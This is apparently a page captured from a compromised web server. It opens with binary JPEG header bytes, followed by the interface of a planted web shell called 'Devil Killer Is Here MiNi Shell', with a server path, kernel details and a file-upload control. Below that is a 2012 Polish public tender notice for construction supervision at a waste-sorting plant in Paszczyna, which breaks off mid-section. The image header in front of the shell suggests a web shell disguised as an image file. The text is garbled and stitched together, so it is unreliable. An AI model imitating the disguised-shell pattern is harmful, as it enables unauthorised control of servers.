JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/157405-N-2012.html

<p class="kh_header"><b>Brzeźnica: Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych w branży:
konstrukcyjno- budowlanej, sanitarnej, elektrycznej i drogowej na zadaniu  inwestycyjnym: Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie</b><br>
<b>Numer ogłoszenia: 157405 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarowania Odpadami sp. z o.o. , Paszczyna 62B, 39-207 Brzeźnica, woj. podkarpackie, tel. 14 6817912, faks 14 6823391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgo.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych w branży:
konstrukcyjno- budowlanej, sanitarnej, elektrycznej i drogowej na zadaniu  inwestycyjnym: Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis  przedmiotu  zamówienia : 

Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych w branży: konstrukcyjno- budowlanej , sanitarnej, elektrycznej i drogowej na zadaniu  inwestycyjnym: 
Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie, 
zgodnie z  ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz.1118 z późn.zmianami) oraz w sposób wynikający z obowiązujących ustaw, postanowień, zarządzeń i decyzji z zakresu realizacji przedmiotu zamówienia, oraz Rozporządzenia Ministra Infrastruktury z dnia 26 czerwca 2002 r.  , w sprawie dziennika budowy, montażu , rozbiórki , tablicy informacyjnej  oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia (Dz. U z dnia 17 lipca 2002 r. ) i umowy z wykonawcą robót budowlanych. Do obowiązków Inspektora Nadzoru należy nadzorowanie robót Wykonawcy realizującego roboty budowlane oraz sprawowanie bieżącej kontroli zgodności realizacji inwestycji z projektami budowlanymi, przepisami, obowiązującymi Polskimi Normami oraz z zasadami wiedzy technicznej a w szczególności :

1) Uczestnictwo w przekazaniu placu budowy  Wykonawcy robót budowlanych,
2) Kontrola jakości wykonywanych robót, wbudowywanych elementów i stosowanych materiałów, zgodnie z przepisami techniczno - budowlanymi, normami państwowymi, zasadami bezpieczeństwa budowy w toku realizacji, zasadami współczesnej wiedzy technicznej oraz zapisami w specyfikacjach technicznych wykonania i odbioru robót budowlanych,
3) Kontrola przebiegu robót zgodnie z harmonogramem rzeczowo- finansowym opracowanym przez Wykonawcę robót budowlanych i zaakceptowanym przez Inwestora oraz terminów wykonania robót budowlanych i dostaw, 
4) Kontrola zgodności zakresu wykonywanych robót budowlanych z dokumentacją projektową oraz warunkami umowy z Wykonawcą robót budowlanych z uwzględnieniem ewentualnych robót dodatkowych zaakceptowanych pisemnie przez Inwestora,
5) Nadzór nad prawidłowym wykonaniem obowiązków przez  Wykonawcę robót budowlanych oraz podwykonawców (również w zakresie który został ewentualnie niedostatecznie określony lub pominięty w dokumentacji projektowej),
6) Kontrola prawidłowości zafakturowania wykonanych robót;
7) Rozstrzyganie wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii  rzeczoznawców; 
8) Udział w komisjach technicznych powoływanych do oceny lub rozstrzygania technicznych spraw inwestycji w toku jej realizacji oraz w komisjach powołanych do stwierdzenia ujawnionych wad w okresie trwania gwarancji i rękojmi (w tym udział w odbiorach pogwarancyjnych),
9) Czuwanie nad przestrzeganiem zakazu wbudowywania materiałów i wyrobów nie dopuszczonych do stosowania w budownictwie, w tym sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań, dotyczących elementów prefabrykowanych i innych wyrobów), dokonywanie ich oceny na placu budowy  przed ich wbudowaniem,
 10) W razie braku wymaganych dokumentów  stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania , Inspektor  nadzoru ma obowiązek żądania od Wykonawcy odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym pisemnym powiadomieniem Inwestora o zaistniałym fakcie, 
11) Sprawdzanie i odbiór (częściowy, końcowy) robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywaniu ich do użytkowania;
12) Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad, a także, wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
13) Inspektor nadzoru ma prawo żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
14) Uczestniczenie w odbiorach częściowych, końcowych, 
15) Na żądanie Zamawiającego składanie pisemnych informacji z przebiegu robót budowlanych,
16) Uczestniczenie co najmniej raz tygodniu w naradach koordynacyjnych zwoływanych przez  Zamawiającego lub wykonawcę robót, 
17) Uczestniczenie w przygotowaniu kompletnego wniosku o wydanie pozwolenia na użytkowanie obiektu,
18) Niezależnie od obowiązków określonych powyżej, na każde żądanie Zamawiającego stawianie się na placu budowy lub w siedzibie Zamawiającego w ciągu 24 godzin. 

2. Bez pisemnej zgody Zamawiającego Inspektor Nadzoru nie jest upoważniony do wydawania wykonawcy polecenia wykonania robót  dodatkowych lub zamiennych.
3. Inspektor Nadzoru jest, w granicach posiadanego umocowania niniejszą umową, przedstawicielem Zamawiającego na budowie, a godziny pracy Inspektora Nadzoru będą dostosowane do czasu pracy Wykonawcy robót budowlanych. 
       
4. Zakres  zadania inwestycyjnego przewidzianego do nadzoru opisany  jest w Załącznikach  do SIWZ : 

   -  Załącznik nr 7  -  Projekt budowlany i wykonawczy dla zadania: Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie - załączony w odrębnym pliku na stronie internetowej Zamawiającego: www.pgo.net.pl.,

   -Załącznik nr 8  - Specyfikacja Techniczna Wykonania i Odbioru Robót dla zadania: Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie - załączona w odrębnym pliku na stronie internetowej Zamawiajacego: www.pgo.net.pl.

Wykonawca winien uwzględnić wszystkie zmiany projektu wykonawczego i STWiOR ujęte w dokumentach :
- Wyjaśnienia treści SIWZ i Zmiana treści SIWZ zamieszczone na w-w stronie internetowej Zamawiającego w dniach 21 i 26 czerwca 2012 r. podczas postępowania o udzielenie zamówienia publicznego na roboty budowlane:  Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt 6) ustawy Prawo zamówień publicznych stanowiących nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienie uzupełniające będzie polegało na powtórzeniu tego samego rodzaju zamówienia tj.: Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych w branży: konstrukcyjno- budowlanej , sanitarnej, elektrycznej  i drogowej  na zadaniu  inwestycyjnym: Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie - etap drugi - Rozbudowa istniejącej instalacji do kompostownia. Zadanie to będzie kontynuacją projektu : Rozbudowa Zakładu Segregacji Odpadów Stałych w Paszczynie i będzie również współfinansowane  ze środków Unii Europejskiej - Fundusz Spójności - Program Operacyjny Infrastruktura i Środowisko , Oś Priorytetowa II : Gospodarka odpadami i ochrona powierzchni ziemi , Działanie 2.1 - Kompleksowe przedsięwzięcia z zakresu gospodarki odpadami komunalnymi ze szczególnym uwzględnieniem odpadów niebezpiecznych.
 W ramach zwiększonego zakresu prac (etap drugi: Rozbudowa istniejącej instalacji do kompostowania)  mają powstać stojące w szeregu, żelbetowe, zamknięte boksy o wysokości około 3,5 m, szerokości 6 m oraz długości około 17 metrów każdy. Boksy wyposażone będą w system napowietrzania, zraszania oraz kanalizację. Boksy te pełnić będą funkcje reaktorów,  w których zachodzić będzie proces intensywnego kompostownia materii organicznej. Wydajność projektowanej kompostowni wynosić będzie około 21.000 Mg/rok. Ponad to zakres prac obejmie m.in. budowę placu manewrowego przed boksami, placu dojrzewania, plac przesiewania, biofiltru oraz magazynu wsadu i gotowych produktów.  W rozbudowanej instalacji procesowi kompostowania poddawane będą odpady o kodzie 19.12.12 powstałe z mechanicznej obróbki odpadu o kodzie 20.03.01 oraz osady ściekowe. Przedmiotowe przedsięwzięcie umożliwi biologiczne przetwarzanie odpadów celem osiągnięcia parametrów wymaganych dla stabilizatu. Przedmiot zamówienia uzupełniającego  będzie obejmował nadzór inwestorski nad 
w-w robotami budowlanymi.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca wykaże,  że 
w okresie ostatnich 3 lat przed  upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  tj. : 

1) Co najmniej 1 usługę polegającą na nadzorze robót budowlanych przy budowie budynku  o kubaturze minimum 2 000,00  m3  o wartości usług - nadzoru budowlanego,  minimum  25 000,00 zł brutto  (wartość usługi nadzoru inwestorskiego) i wartości robót budowlanych w nadzorowanej inwestycji minimum 1 000 000,00 zł,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie,

2) Co najmniej 1 usługę polegającą na nadzorze robót budowlanych przy budowie hali o konstrukcji stalowej i kubaturze minimum 25 000,00  m3  o wartości usług - nadzoru budowlanego,  minimum  50 000,00 zł brutto  (wartość usługi nadzoru inwestorskiego) i wartości robót budowlanych w nadzorowanej inwestycji minimum 3 000 000,00 zł , z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokument potwierdzający, że usługi te zostały wykonane lub są wykonywane należycie.
Zgodnie z art. 26 ust.2b ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

                   W przypadku złożenia wraz z ofertą  przez Wykonawców w-w zobowiązania, Zamawiający powołując się na przepis art.26. ust 2b ustawy Pzp, przepisy art. 78 § 1 Kodeksu Cywilnego, oraz orzecznictwo KIO, stwierdza iż wymaganie  formy pisemnej zobowiązania zostanie spełnione jedynie poprzez złożenie oryginału dokumentu zawierającego własnoręczny podpis osoby pod treścią oświadczenia - zobowiązania podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ).
Zamawiający nie precyzuje konkretnych warunków udziału w postępowaniu dotyczących dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca wykaże, że w wykonaniu zamówienia będą uczestniczyć osoby z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie, w zakresie kierowania i nadzorowania robót budowlanych  tj.  : 

a) - minimum 1 osoba posiadająca uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń w  specjalności konstrukcyjno- budowlanej (lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa) i posiadająca minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru w branży konstrukcyjno- budowlanej od dnia uzyskania  uprawnień budowlanych do dnia terminu składania ofert - osoba ta będzie pełnić obowiązki Inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej oraz koordynatora pozostałych inspektorów nadzoru przy realizacji zamówienia, 
  - Opis rodzaju uprawnień budowlanych z jednoznacznym wskazaniem, że są to uprawnienia budowlane bez ograniczeń w branży konstrukcyjno- budowlanej i opis rodzaju specjalności posiadanych uprawnień należy zamieścić w Wykazie osób (Załącznik nr 4 do SIWZ)  w rubryce :  -Posiadane kwalifikacje zawodowe-  .
- Opis doświadczenia zawodowego i stażu pracy na stanowisku kierownika budowy lub inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej należy wykazać w w-w wykazie osób w rubryce doświadczenie zawodowe lub w osobnym opracowaniu załączonym do oferty. Z opisu doświadczenia zawodowego i stażu pracy winno jednoznacznie wynikać, że osoba wskazana do wykonywania obowiązków inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej i koordynatora pozostałych inspektorów nadzoru, posiada minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej od dnia uzyskania  uprawnień budowlanych do dnia upływu składania ofert. Należy wykazać konkretne daty pełnienia funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej od - do ( dzień, miesiąc, rok) oraz  konkretnie określić inwestycję (nazwa  robót budowlanych-budowy). Wykazane okresy (czas)  pełnienia funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej nie mogą się dublować tzn. Zamawiający nie uzna warunku za spełniony jeżeli w tym samym okresie (czasie) wykonawcy wykażą pełnienie funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży konstrukcyjno- budowlanej na więcej niż jednej budowie (inwestycji), oraz


b) - minimum 1 osoba posiadająca    uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych (lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa)  i posiadająca minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży sanitarnej od dnia uzyskania  uprawnień budowlanych do dnia upływu składania ofert -osoba ta będzie pełnić obowiązki Inspektora nadzoru inwestorskiego w branży sanitarnej,
- Opis rodzaju uprawnień budowlanych z jednoznacznym wskazaniem, że są to uprawnienia budowlane bez ograniczeń  i opis rodzaju specjalności posiadanych uprawnień należy zamieścić w Wykazie osób (Załącznik nr 4 do SIWZ)  w rubryce :  -Posiadane kwalifikacje zawodowe-,
- Opis doświadczenia zawodowego i stażu pracy na stanowisku kierownika budowy lub inspektora nadzoru inwestorskiego w branży sanitarnej należy wykazać w wykazie osób w rubryce doświadczenie zawodowe - Załącznik nr 4 do SIWZ lub w osobnym opracowaniu załączonym do oferty.  Z opisu doświadczenia zawodowego i stażu pracy winno jednoznacznie wynikać, że osoba wskazana do wykonywania obowiązków inspektora nadzoru inwestorskiego w branży sanitarnej posiada minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży sanitarnej od dnia uzyskania  uprawnień budowlanych do dnia upływu terminu składania ofert. Należy wykazać konkretne daty pełnienia funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży sanitarnej od - do ( dzień, miesiąc, rok) oraz  konkretnie określić inwestycję (nazwa  robót budowlanych-budowy). Wykazane okresy (czas)  pełnienia funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży sanitarnej nie mogą się dublować tzn. Zamawiający nie uzna warunku za spełniony jeżeli w tym samym okresie (czasie) wykonawcy wykażą pełnienie funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży sanitarnej na więcej niż jednej budowie (inwestycji), oraz 


c) - minimum 1 osoba posiadająca uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
elektroenergetycznych (lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa) i posiadająca minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego  w branży elektrycznej od dnia uzyskania  uprawnień budowlanych do dnia upływu składania ofert, - osoba ta będzie pełnić obowiązki Inspektora nadzoru inwestorskiego w branży elektrycznej.
 - Opis rodzaju uprawnień budowlanych z wskazaniem, że są to uprawnienia budowlane bez ograniczeń i opis rodzaju
specjalności posiadanych uprawnień należy zamieścić w Wykazie osób (Załącznik nr 4 do SIWZ)  w rubryce : 
-Posiadane kwalifikacje zawodowe-,
 - Opis doświadczenia zawodowego i stażu pracy na stanowisku kierownika budowy lub inspektora nadzoru inwestorskiego w branży elektrycznej należy wykazać w wykazie osób w rubryce doświadczenie zawodowe - Załącznik nr 4 do SIWZ lub w osobnym opracowaniu załączonym do oferty.  Z opisu doświadczenia zawodowego i stażu pracy winno jednoznacznie wynikać, że osoba wskazana do wykonywania obowiązków inspektora nadzoru w branży elektrycznej posiada minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru w branży elektrycznej od dnia uzyskania  uprawnień budowlanych do dnia upływu terminu  składania ofert. Należy wykazać konkretne daty pełnienia funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży elektrycznej od - do ( dzień, miesiąc, rok) oraz  konkretnie określić inwestycję (nazwa  robót budowlanych-budowy). Wykazane okresy (czas)  pełnienia funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży elektrycznej nie mogą się dublować tzn. Zamawiający nie uzna warunku za spełniony jeżeli w tym samym okresie (czasie) wykonawcy wykażą pełnienie funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w branży elektrycznej na więcej niż jednej budowie (inwestycji), oraz
               


d)  minimum 1 osoba posiadająca    uprawnienia budowlane w zakresie kierowania i nadzorowania robót budowlanych w specjalności drogowej , 
- Opis rodzaju uprawnień budowlanych  i opis rodzaju specjalności posiadanych uprawnień należy zamieścić w Wykazie osób (Załącznik nr 4 do SIWZ)  w rubryce -Posiadane kwalifikacje zawodowe-, oraz  

e) Ponadto  Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca wykaże, że w wykonaniu zamówienia będzie uczestniczyć osoba pełniąca obowiązki technologa. Technolog - winien posiadać doświadczenie zawodowe polegające na  udokumentowanym uczestnictwie (np. poprzez zarządzanie technologią na stanowisku samodzielnym lub w pracy o charakterze technologa) przy instalacji, montażu i oddaniu do użytkowania minimum 1  technologicznej instalacji linii segregacji odpadów komunalnych o przepustowości minimum 12 000 Mg/rok .

         Zamawiający dopuszcza aby osoba pełniąca obowiązki inspektora nadzoru w branży sanitarnej równocześnie pełniła obowiązki technologa przy spełnianiu wszystkich opisanych powyżej warunków udziału w postępowaniu dotyczących osób zdolnych do wykonania zamówienia.

                  Zamawiający określając wymagania dla osób w zakresie posiadania uprawnień budowlanych dopuszcza odpowiadające im uprawnienia, wydane obywatelom państw Europejskiego Obszaru gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity Dz.U. z 2006 r. 
Nr 156, poz.1118 z późn.zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz.394).
Zgodnie z art. 26 ust.2b ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

                   W przypadku złożenia wraz z ofertą  przez Wykonawców w-w zobowiązania, Zamawiający powołując się na przepis art.26. ust 2b ustawy Pzp, przepisy art. 78 § 1 Kodeksu Cywilnego, oraz orzecznictwo KIO, stwierdza iż wymaganie  formy pisemnej zobowiązania zostanie spełnione jedynie poprzez złożenie oryginału dokumentu zawierającego własnoręczny podpis osoby pod treścią oświadczenia - zobowiązania podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
